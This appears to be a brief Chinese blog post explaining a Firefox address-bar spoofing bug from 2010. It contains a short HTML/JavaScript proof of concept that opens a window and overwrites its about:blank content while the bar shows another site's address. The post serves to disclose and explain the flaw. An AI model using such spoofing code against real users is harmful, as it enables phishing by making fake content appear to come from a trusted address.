Firefox的address bar欺骗漏洞

http://lcamtuf.blogspot.com/2010/06/yeah-about-that-address-bar-thing.html

问题出在浏览器打开新窗口时,这时的document是 about:blank,但是出于用户体验,浏览器的address bar会写入目标地址,可是 blank的document是可以被当前页面修改的。

POC:
<input type=submit value="Click me!" onclick="clicked()">
<script>
var w;
function clicked() {
w = window.open("http://1.2.3.4/", "_blank", "toolbar=1,menubar=1");
setTimeout(‘w.document.body.innerHTML = "Fake content!";w.stop();’, 500);
}
</script>

发表评论?

0 条评论。

发表评论